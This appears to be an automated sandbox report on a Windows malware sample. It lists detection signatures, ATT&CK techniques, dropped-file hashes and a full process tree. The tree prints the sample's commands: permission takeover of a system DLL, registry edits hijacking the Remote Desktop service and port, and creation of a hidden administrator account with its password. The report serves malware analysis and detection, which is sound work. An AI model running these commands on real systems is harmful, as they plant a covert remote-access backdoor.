3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6

Analysis

max time kernel
145s
max time network
49s
platform
windows7_x64
resource
win7-20220414-en
submitted
03-07-2022 09:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6.exe
Size

3.0MB
MD5

df759879f60a7276ff8911c366cbb8a5
SHA1

26fa79f21bc021128e91e5142f6a17c07e750251
SHA256

3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6
SHA512

57c5780ba66d73f15f13a227dd012fef2b1c921d6d79e2bf8a14a0b0b9581a4854c82434be779f4d9fee32729d80b0a75f1907b5e08cf11c6499b7040b8387db

Score

9^/10

discovery exploit persistence upx

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
1032	takeown.exe
1708	icacls.exe
1824	icacls.exe
1876	icacls.exe
1440	icacls.exe
1704	icacls.exe
1752	icacls.exe
1560	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "c:\\program files\\windows mail\\appcache.xml"	reg.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000c0000000139f8-88.dat	upx
behavioral1/files/0x0008000000013a08-89.dat	upx

Deletes itself 1 IoCs

pid	Process
1180	powershell.exe

Loads dropped DLL 5 IoCs

pid	Process
1296	3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6.exe
1296	3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6.exe
1296	3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6.exe
1096	Process not Found
1096	Process not Found

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1032	takeown.exe
1708	icacls.exe
1824	icacls.exe
1876	icacls.exe
1440	icacls.exe
1704	icacls.exe
1752	icacls.exe
1560	icacls.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\windows mail\appcache.xml	powershell.exe
File created	C:\Program Files\windows mail\default_list.xml	powershell.exe
File created	C:\Program Files\windows mail\cleanuptask.cfg	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1732	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1180	powershell.exe
1180	powershell.exe
1180	powershell.exe
1180	powershell.exe

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
460	Process not Found
1096	Process not Found
1096	Process not Found
1096	Process not Found
1096	Process not Found
1096	Process not Found

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1180	powershell.exe
Token: SeRestorePrivilege	1824	icacls.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1296 wrote to memory of 1716	1296	3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6.exe	27
PID 1296 wrote to memory of 1716	1296	3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6.exe	27
PID 1296 wrote to memory of 1716	1296	3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6.exe	27
PID 1296 wrote to memory of 1716	1296	3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6.exe	27
PID 1716 wrote to memory of 1180	1716	cmd.exe	29
PID 1716 wrote to memory of 1180	1716	cmd.exe	29
PID 1716 wrote to memory of 1180	1716	cmd.exe	29
PID 1180 wrote to memory of 1032	1180	powershell.exe	31
PID 1180 wrote to memory of 1032	1180	powershell.exe	31
PID 1180 wrote to memory of 1032	1180	powershell.exe	31
PID 1180 wrote to memory of 1708	1180	powershell.exe	32
PID 1180 wrote to memory of 1708	1180	powershell.exe	32
PID 1180 wrote to memory of 1708	1180	powershell.exe	32
PID 1180 wrote to memory of 1824	1180	powershell.exe	33
PID 1180 wrote to memory of 1824	1180	powershell.exe	33
PID 1180 wrote to memory of 1824	1180	powershell.exe	33
PID 1180 wrote to memory of 1876	1180	powershell.exe	34
PID 1180 wrote to memory of 1876	1180	powershell.exe	34
PID 1180 wrote to memory of 1876	1180	powershell.exe	34
PID 1180 wrote to memory of 1440	1180	powershell.exe	35
PID 1180 wrote to memory of 1440	1180	powershell.exe	35
PID 1180 wrote to memory of 1440	1180	powershell.exe	35
PID 1180 wrote to memory of 1704	1180	powershell.exe	36
PID 1180 wrote to memory of 1704	1180	powershell.exe	36
PID 1180 wrote to memory of 1704	1180	powershell.exe	36
PID 1180 wrote to memory of 1752	1180	powershell.exe	37
PID 1180 wrote to memory of 1752	1180	powershell.exe	37
PID 1180 wrote to memory of 1752	1180	powershell.exe	37
PID 1180 wrote to memory of 1560	1180	powershell.exe	38
PID 1180 wrote to memory of 1560	1180	powershell.exe	38
PID 1180 wrote to memory of 1560	1180	powershell.exe	38
PID 1180 wrote to memory of 1036	1180	powershell.exe	39
PID 1180 wrote to memory of 1036	1180	powershell.exe	39
PID 1180 wrote to memory of 1036	1180	powershell.exe	39
PID 1180 wrote to memory of 1732	1180	powershell.exe	40
PID 1180 wrote to memory of 1732	1180	powershell.exe	40
PID 1180 wrote to memory of 1732	1180	powershell.exe	40
PID 1180 wrote to memory of 1540	1180	powershell.exe	41
PID 1180 wrote to memory of 1540	1180	powershell.exe	41
PID 1180 wrote to memory of 1540	1180	powershell.exe	41
PID 1180 wrote to memory of 952	1180	powershell.exe	42
PID 1180 wrote to memory of 952	1180	powershell.exe	42
PID 1180 wrote to memory of 952	1180	powershell.exe	42
PID 952 wrote to memory of 980	952	net.exe	43
PID 952 wrote to memory of 980	952	net.exe	43
PID 952 wrote to memory of 980	952	net.exe	43
PID 1180 wrote to memory of 1072	1180	powershell.exe	44
PID 1180 wrote to memory of 1072	1180	powershell.exe	44
PID 1180 wrote to memory of 1072	1180	powershell.exe	44
PID 1072 wrote to memory of 1736	1072	cmd.exe	45
PID 1072 wrote to memory of 1736	1072	cmd.exe	45
PID 1072 wrote to memory of 1736	1072	cmd.exe	45
PID 1736 wrote to memory of 668	1736	cmd.exe	46
PID 1736 wrote to memory of 668	1736	cmd.exe	46
PID 1736 wrote to memory of 668	1736	cmd.exe	46
PID 668 wrote to memory of 1140	668	net.exe	47
PID 668 wrote to memory of 1140	668	net.exe	47
PID 668 wrote to memory of 1140	668	net.exe	47
PID 1180 wrote to memory of 812	1180	powershell.exe	48
PID 1180 wrote to memory of 812	1180	powershell.exe	48
PID 1180 wrote to memory of 812	1180	powershell.exe	48
PID 812 wrote to memory of 1348	812	cmd.exe	49
PID 812 wrote to memory of 1348	812	cmd.exe	49
PID 812 wrote to memory of 1348	812	cmd.exe	49

C:\Users\Admin\AppData\Local\Temp\3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6.exe
"C:\Users\Admin\AppData\Local\Temp\3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1296
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\premiumextraXEUKJDDYYG.ps1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\premiumextraXEUKJDDYYG.ps1
    3⤵
    - Deletes itself
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1180
  - - C:\Windows\system32\takeown.exe
      "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1032
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1708
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:1824
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1876
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1440
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1704
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1752
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1560
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
      4⤵
      PID:1036
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d "c:\program files\windows mail\appcache.xml" /f
      4⤵
      Sets DLL path for service in the registry
      Modifies registry key
      PID:1732
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
      4⤵
      PID:1540
  - - C:\Windows\system32\net.exe
      "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      Suspicious use of WriteProcessMemory
      PID:952
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        5⤵
        
        PID:980
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cmd/c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1072
    - - C:\Windows\system32\cmd.exe
        
        cmd /c net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1736
      - C:\Windows\system32\net.exe
        
        net start rdpdr
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:668
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        7⤵
        
        PID:1140
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cmd/c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:812
    - - C:\Windows\system32\cmd.exe
        
        cmd /c net start TermService
        5⤵
        
        PID:1348
      - C:\Windows\system32\net.exe
        
        net start TermService
        6⤵
        
        PID:1992
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        7⤵
        
        PID:2016
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
      4⤵
      PID:620
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
      4⤵
      PID:1508

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc 0000999999 /del
1⤵
PID:1848
- C:\Windows\system32\net.exe
  net.exe user wgautilacc 0000999999 /del
  2⤵
  PID:1296
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc 0000999999 /del
    3⤵
    PID:844

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc nnDm4L2C /add
1⤵
PID:1588
- C:\Windows\system32\net.exe
  net.exe user wgautilacc nnDm4L2C /add
  2⤵
  PID:1836
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc nnDm4L2C /add
    3⤵
    PID:960

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
PID:1688
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  2⤵
  PID:1824
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    3⤵
    PID:1968

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" TBHNEBSE$ /ADD
1⤵
PID:1128
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" TBHNEBSE$ /ADD
  2⤵
  PID:1752
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TBHNEBSE$ /ADD
    3⤵
    PID:1156

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:1728
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  2⤵
  PID:964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
    3⤵
    PID:1900

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc nnDm4L2C
1⤵
PID:1912
- C:\Windows\system32\net.exe
  net.exe user wgautilacc nnDm4L2C
  2⤵
  PID:1140
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc nnDm4L2C
    3⤵
    PID:1072

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\add.ps1

Filesize
112KB

MD5
1fad9bbbd35b9d3387ffe3334dedb29f

SHA1
5a23745103c53d0687ea029f78b87188be0984a5

SHA256
8981e715b26d56fe291878f9b2b23a8e27160ab66cfd374377fb72302aa3f61e

SHA512
b32aa61b3e21ba7d64b1efc84e4f487a48c367e17a1c788d287be92569f7e1dbf6c81427a2190fb71f90d683a9bd7929a46ab20347778611805eaf2a45c7f50c

Download Submit
C:\Users\Admin\AppData\Local\Temp\chadshfsd323.txt

Filesize
102B

MD5
5c2db4d82f47ade611b7f4b738d8c0e3

SHA1
a84f233c16beb5579c4e33bb6e14f34ee5ac8227

SHA256
5a841e119a66efae3c7b034a32d0f9832673db1ebd2768d828440fd167352dfb

SHA512
21250b8d1fd16dd52b35dc17a42edc2ca6a0fcf7146dbbdde49b26407cfd51a27f78919374c748744deac24414f7d3113803a25990a157bd1c76177489e89949

Download Submit
C:\Users\Admin\AppData\Local\Temp\premiumextraXEUKJDDYYG.ps1

Filesize
3.5MB

MD5
b012a0a6c20d3dd529f4cd437a3be021

SHA1
771ac8896af151a287e20abd721c601f2843a6e8

SHA256
cf2e059f248615933a78e988321e5cc6ca55463e62e7cbc96fb02bf935d0659a

SHA512
2d414d89ba01914ad16e9b92fd8ae4e9d637d21d984dba20381015dbc34780842b3cd0146f5938d6cb7c5fb8dca1729a4f84beb6598b28fec71fdaa2ccbf6cc5

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\Program Files\Windows Mail\appcache.xml

Filesize
54KB

MD5
9b7e262bc9d18042b92b9d9f9bd6e0e3

SHA1
eba7927cf0187593c2e8d8e809cd8ebb9615512e

SHA256
8b64700ce643f806f57ca6d272007868ae75642bcafb87964e8e553d97334b3d

SHA512
3f1cf017326e05b3ccbeb301d02a2273a4800d618c9d7729830eeaf17afc067c1f20d0298830efdb46c8459f448e26da6567441d4e41917c1990837361c5028c

Download Submit
\Program Files\Windows Mail\default_list.xml

Filesize
789KB

MD5
939af66cd1befa90bbb1fa1e6d5e2ed6

SHA1
65f462ed99b4b54fc959f0a0bfd6d871e544cb44

SHA256
9ad96e4c82b148b927f959722680fbe02d6ec6f37dc80160b8b6066afebe3d4c

SHA512
de52e5574d43aed03a3adcd73ffeba936fe84c506190c16ed925ee51122e107b0a9077f7664c5ec6370b4bfe8989943d4d57a6b3e827aab74b014c079a723aa2

Download Submit
\Users\Admin\AppData\Local\Temp\nsd2EFF.tmp\System.dll

Filesize
11KB

MD5
fbe295e5a1acfbd0a6271898f885fe6a

SHA1
d6d205922e61635472efb13c2bb92c9ac6cb96da

SHA256
a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1

SHA512
2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

Download Submit
\Users\Admin\AppData\Local\Temp\nsd2EFF.tmp\blowfish.dll

Filesize
22KB

MD5
5afd4a9b7e69e7c6e312b2ce4040394a

SHA1
fbd07adb3f02f866dc3a327a86b0f319d4a94502

SHA256
053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae

SHA512
f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511

Download Submit
\Users\Admin\AppData\Local\Temp\nsd2EFF.tmp\blowfish.dll

Filesize
22KB

MD5
5afd4a9b7e69e7c6e312b2ce4040394a

SHA1
fbd07adb3f02f866dc3a327a86b0f319d4a94502

SHA256
053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae

SHA512
f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511

Download Submit
memory/1180-65-0x00000000028CB000-0x00000000028EA000-memory.dmp

Filesize
124KB

Download
memory/1180-62-0x000007FEF3900000-0x000007FEF445D000-memory.dmp

Filesize
11.4MB

Download
memory/1180-97-0x00000000028C4000-0x00000000028C7000-memory.dmp

Filesize
12KB

Download
memory/1180-111-0x00000000028CB000-0x00000000028EA000-memory.dmp

Filesize
124KB

Download
memory/1180-60-0x000007FEFC4B1000-0x000007FEFC4B3000-memory.dmp

Filesize
8KB

Download
memory/1180-61-0x000007FEF4460000-0x000007FEF4E83000-memory.dmp

Filesize
10.1MB

Download
memory/1180-109-0x00000000028CB000-0x00000000028EA000-memory.dmp

Filesize
124KB

Download
memory/1180-110-0x00000000028C4000-0x00000000028C7000-memory.dmp

Filesize
12KB

Download
memory/1180-63-0x00000000028C4000-0x00000000028C7000-memory.dmp

Filesize
12KB

Download
memory/1296-54-0x0000000075741000-0x0000000075743000-memory.dmp

Filesize
8KB

Download